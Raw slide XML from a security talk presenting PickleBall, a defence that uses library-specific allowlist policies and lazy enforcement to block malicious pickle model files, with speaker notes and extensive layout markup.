              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PickleBall protects model users from malicious pickle models with library-specific policies, which provide security and improved usability as a security solution. Its core idea is to use an allowlist approach that applies context to its policies, rather than a one-size-fits-all approach, and overcomes limitations of static analysis to securely improve usability with lazy enforcement.</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We make our artifact, including datasets, is available accessible.</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Thank you for your attention, and I welcome any questions.</a:t>
            </a:r>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17" name="Shape 1117"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118" name="Google Shape;1118;g384a658f6df_0_4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19" name="Google Shape;1119;g384a658f6df_0_4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23" name="Shape 1123"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124;g383391f3239_0_1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25" name="Google Shape;1125;g383391f3239_0_1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35" name="Shape 1135"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136" name="Google Shape;1136;g383391f3239_0_16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37" name="Google Shape;1137;g383391f3239_0_16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44" name="Shape 1144"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;g383391f3239_0_8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46" name="Google Shape;1146;g383391f3239_0_8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51" name="Shape 1151"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1152" name="Google Shape;1152;g384641fc418_0_13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53" name="Google Shape;1153;g384641fc418_0_13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58" name="Shape 1158"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159" name="Google Shape;1159;g3818d0781ce_0_6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60" name="Google Shape;1160;g3818d0781ce_0_6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67" name="Shape 1167"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Google Shape;1168;g5c4979f16b5e051b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69" name="Google Shape;1169;g5c4979f16b5e051b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76" name="Shape 1176"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="Google Shape;1177;g5c4979f16b5e051b_2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78" name="Google Shape;1178;g5c4979f16b5e051b_2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The dangers of pickle are known. Official Python documentation warns users not to deserialization untrusted data.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To protect the ML mode loading problem, we have some existing defenses:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Alternate formats, like Hugging Face’s SafeTensors, are recommended over pickle. These formats are less expressive, and typically only encode weight values. However, pickle is still very popular: as part of our work, we studied trends in model serialization formats over a two year period, and found that number of monthly pickle model downloads are actually increasing despite these alternate formats.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Model scanners are used to analyze models …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Restricted loaders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4" name="Shape 404"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Google Shape;405;g384641fc418_0_8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06" name="Google Shape;406;g384641fc418_0_8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Attackers abuse the model loading process, where a saved model is deserialized from a file into the program memory.</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While many model serialization formats exist, like SafeTensors, GGUF, and others, the most widely abused is pickle. Almost all discovered backdoors abuse the pickle format. </a:t>
            </a:r>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92" name="Shape 1192"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;g3818d0781ce_0_9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94" name="Google Shape;1194;g3818d0781ce_0_9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PickleBall enforces a library’s policy when it is used to load a model using a library’s API.</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PickleBall’s enforcement component is a modified Pickle Machine that restricts the import and invoke opcodes to respect the given policy.</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12" name="Shape 1212"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213" name="Google Shape;1213;g384641fc418_0_49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14" name="Google Shape;1214;g384641fc418_0_49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Because the statically generated policies may be imperfect, a naive implementation blocks any models that uses a missing callable.</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Sometimes, a model contain callables that are imported but not accessed during loading or inference tasks - PickleBall handles these cases with </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lazy enforcement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which allows loading to continue until a disallowed callable is accessed or invoked. These cases could occur when a callable represents metadata about how the model was trained, but which is not needed to load the model.</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33" name="Shape 1233"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;1234;g36676170008_0_2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35" name="Google Shape;1235;g36676170008_0_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When a disallowed callable is imported, PickleBall does not immediately raise an exception. It creates a stub object to represent the callable, and continues loading the model.</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56" name="Shape 1256"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1257" name="Google Shape;1257;g36676170008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58" name="Google Shape;1258;g36676170008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[Next]</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79" name="Shape 1279"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1280" name="Google Shape;1280;g36676170008_0_4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81" name="Google Shape;1281;g36676170008_0_4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When the stub object is accessed or invoked, a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n exception is raised.</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This provides increased usability to load more benign models without sacrificing security.</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1" name="Shape 411"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Google Shape;412;g388d55caf50_0_27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13" name="Google Shape;413;g388d55caf50_0_27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Attackers abuse the model loading process, where a saved model is deserialized from a file into the program memory.</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While many model serialization formats exist, like SafeTensors, GGUF, and others, the most widely abused is pickle. Almost all discovered backdoors abuse the pickle format.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8" name="Shape 418"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;419;g388d55caf50_0_26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20" name="Google Shape;420;g388d55caf50_0_26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Attackers abuse the model loading process, where a saved model is deserialized from a file into the program memory.</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While many model serialization formats exist, like SafeTensors, GGUF, and others, the most widely abused is pickle. Almost all discovered backdoors abuse the pickle format.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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.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jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.jp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jp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jp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jp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jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.pn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5.jp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7.jp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2.jp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2.jp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Page">
  <p:cSld name="10_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="12" name="Shape 12"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;13;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-712"/>
            <a:ext cx="4610400" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Google Shape;14;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="437" l="49588" r="11021" t="20071"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584825" y="-1200"/>
            <a:ext cx="4559179" cy="5175195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;15;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616800" y="1099875"/>
            <a:ext cx="3331500" cy="402000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="2300"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598163" y="1501950"/>
            <a:ext cx="3414000" cy="862500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter SemiBold"/>
                <a:ea typeface="Inter SemiBold"/>
                <a:cs typeface="Inter SemiBold"/>
                <a:sym typeface="Inter SemiBold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;17;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="689344" y="2415244"/>
            <a:ext cx="3259200" cy="1746000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-304800" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-304800" lvl="3" marL="1828800">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-304800" lvl="4" marL="2286000">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl7pPr>
